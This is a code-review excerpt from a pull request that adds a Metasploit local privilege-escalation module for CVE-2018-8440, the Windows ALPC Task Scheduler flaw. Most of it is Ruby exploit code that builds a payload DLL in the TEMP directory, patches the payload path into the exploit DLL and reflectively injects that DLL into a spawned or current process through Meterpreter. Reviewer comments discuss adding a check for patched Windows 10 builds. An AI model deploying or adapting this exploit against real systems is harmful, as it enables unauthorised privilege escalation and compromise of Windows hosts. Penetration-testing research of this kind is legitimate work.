modules/exploits/windows/local/alpc_taskscheduler.rb

```diff
@@ -0,0 +1,194 @@
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+      print_good("Process #{process.pid} launched.")
+    rescue Rex::Post::Meterpreter::RequestError
+      # Sandboxes could not allow to create a new process
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      print_error('Operation failed. Trying to elevate the current process...')
+      process = client.sys.process.open
+    end
+    process
+  end
+
+  def setup
+    super
+    @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
+    @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    @payload_name = "#{payload_name}.dll" unless payload_name.match(/\.dll$/i)
+    @payload_path = "#{temp_path}\\#{payload_name}"
+
+    @payload_dll = generate_payload_dll
+    @original_path = ('A' * 80)
+  end
+
+  def overwrite_payload_path(exploit_data)
+    # The payload path is hard-coded into the exploit
+    # We need to change it, but the exploit binary is in UTF-16LE
+    # But our parsers (right now) expect it to be encoded as ANSI-8bit
+    # Covert the exploit binary to UTF-16, switch the values, then return
+    # the encoding to whatever it was to begin with
+    print_status("Attempting to change the payload path to #{payload_path}...")
+
+    if payload_path.length > original_path.length
+      fail_with(Failure::BadConfig,"Parameter PAYLOAD_NAME may not exceed #{original_path.length} characters, including extension")
+    end
+
+    original_encoding = exploit_data.encoding
+    padded_path = payload_path + ("\x00" * (original_path.length-payload_path.length))
+
+    padded_path.encode!("UTF-16LE")
+    original_path.encode!("UTF-16LE")
+    exploit_data.force_encoding("UTF-16LE")
+
+    exploit_data.sub!(original_path, padded_path)
+    exploit_data.force_encoding(original_encoding)
+  end
+
+  def inject_magic(process)
+    library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8440', 'ALPC-TaskSched-LPE.dll')
+    library_path = ::File.expand_path(library_path)
+    dll_data = ''
+    ::File.open(library_path, 'rb') { |f| dll_data = f.read }
+    overwrite_payload_path(dll_data)
+    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
+    exploit_mem, offset = inject_dll_data_into_process(process, dll_data)
+    process.thread.create(exploit_mem + offset)
+
+  end
+
+  def validate_active_host
+    begin
+      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
+    rescue Rex::Post::Meterpreter::RequestError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      raise Msf::Exploit::Failed, 'Could not connect to session'
+    end
+  end
+
+  def validate_remote_path(path)
+    unless directory?(path)
+      fail_with(Failure::Unreachable, "#{path} does not exist on the target")
+    end
+  end
+
+  def validate_target
```

Comment:
Should this instead be the `check` method that makes sure the target OS/version/arch is supported?

Reply:
A `check` method can be added.

Reply:
https://github.com/jrobles-r7/metasploit-framework/commit/39128df869fcda607e7e031478385117e9349d79
I was going to try checking for installed hotfix ids but there are a lot and I'm not sure how to pull the info I need from meterpreter, specifically Win10 releases/version? (1607, 1703, 1709, 1803). [Some of the hotfix ids also depend on Security Updates vs Monthly Rollout](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440). 
I linked to a check example for this module in my repo. Any suggestions? 
@OJ @bcoles